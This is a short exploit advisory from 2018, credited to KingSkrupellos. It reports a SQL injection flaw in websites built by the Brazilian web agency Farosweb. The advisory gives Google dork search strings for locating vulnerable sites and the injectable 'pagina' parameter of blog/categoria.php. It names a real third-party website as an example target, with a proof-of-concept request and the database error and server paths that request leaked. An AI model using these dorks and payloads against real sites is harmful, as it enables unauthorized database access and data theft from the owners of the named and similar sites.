facebook facebook twitter rss

Desenvolvido pela Farosweb Agência Digital Brazil SQL

Author: KingSkrupellos , Published: 08-10-2018
# Exploit Title : Desenvolvido pela Farosweb Agência Digital Brazil SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : farosweb.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''© 2016 - Todos os direitos reservados. Desenvolvido pela Farosweb.''

intext:''Desenvolvido pela Farosweb''

# SQL Injection Exploit :

/blog/categoria.php?pagina=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

lucaspiubelli.com/blog/categoria.php?pagina=0%27 => [ Proof of Concept ] =>

# SQL Database Error =>

Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '-6, 6' at line 1' in /home/lucaspiu/public_html/
blog/categoria.php:27 Stack trace: #0 /home/lucaspiu/public_html/blog/categoria.php(27): PDOStatement->
execute() #1 {main} thrown in /home/lucaspiu/public_html/blog/categoria.php on line 27

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :